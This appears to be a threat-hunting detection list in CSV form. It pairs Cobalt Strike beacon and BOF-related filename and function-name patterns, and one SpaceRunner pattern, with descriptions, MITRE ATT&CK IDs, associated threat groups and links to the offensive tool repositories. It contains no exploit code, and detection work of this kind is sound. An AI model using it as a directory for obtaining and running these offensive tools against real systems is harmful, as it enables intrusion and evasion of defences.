-*beacon.exe*,offensive_tool_keyword,cobaltstrike,default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon.nim*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF Files with Nim!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/byt3bl33d3r/BOF-Nim,1,1,N/A,10,10,83,12,2022-07-10T22:12:10Z,2021-01-12T18:58:23Z -*Beacon.Object.File.zip*,offensive_tool_keyword,cobaltstrike,A Visual Studio template used to create Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/securifybv/Visual-Studio-BOF-template,1,1,N/A,10,10,210,46,2021-11-17T12:03:42Z,2021-11-13T13:44:01Z -*beacon.ps1*beacon.exe*,offensive_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Mr-B0b/SpaceRunner,1,0,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z -*beacon.x64*.dll*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon.x64*.exe*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon.x64.dll*,offensive_tool_keyword,cobaltstrike,Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/Malleable-C2-Profiles,1,1,N/A,10,10,1362,429,2021-05-18T14:45:39Z,2014-07-14T15:02:42Z -*beacon.x86*.dll*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon.x86*.exe*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_api.h*,offensive_tool_keyword,cobaltstrike,This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/ELFLoader,1,0,N/A,10,10,204,40,2022-05-16T17:48:40Z,2022-04-26T19:18:20Z -*beacon_bottom *,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*Beacon_Com_Struct*,offensive_tool_keyword,cobaltstrike,SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tylous/SourcePoint,1,1,N/A,10,10,792,122,2022-11-17T01:04:04Z,2021-08-06T20:55:26Z -*beacon_command_describe*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_command_detail*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*beacon_command_detail*,offensive_tool_keyword,cobaltstrike,Section Mapping Process Injection (secinject): Cobalt Strike BOF,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/apokryptein/secinject,1,1,N/A,10,10,79,20,2022-01-07T21:09:32Z,2021-09-05T01:17:47Z -*beacon_command_register*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ajpc500/BOFs,1,1,N/A,10,10,475,115,2022-11-01T14:51:07Z,2020-12-19T11:21:40Z -*beacon_command_register*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_commands*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*beacon_compatibility.c*,offensive_tool_keyword,cobaltstrike,This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/COFFLoader,1,1,N/A,10,10,386,62,2023-05-15T20:42:41Z,2021-02-19T19:14:43Z -*beacon_compatibility.h*,offensive_tool_keyword,cobaltstrike,This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/COFFLoader,1,1,N/A,10,10,386,62,2023-05-15T20:42:41Z,2021-02-19T19:14:43Z -*beacon_elevator_describe*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*beacon_elevator_describe*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 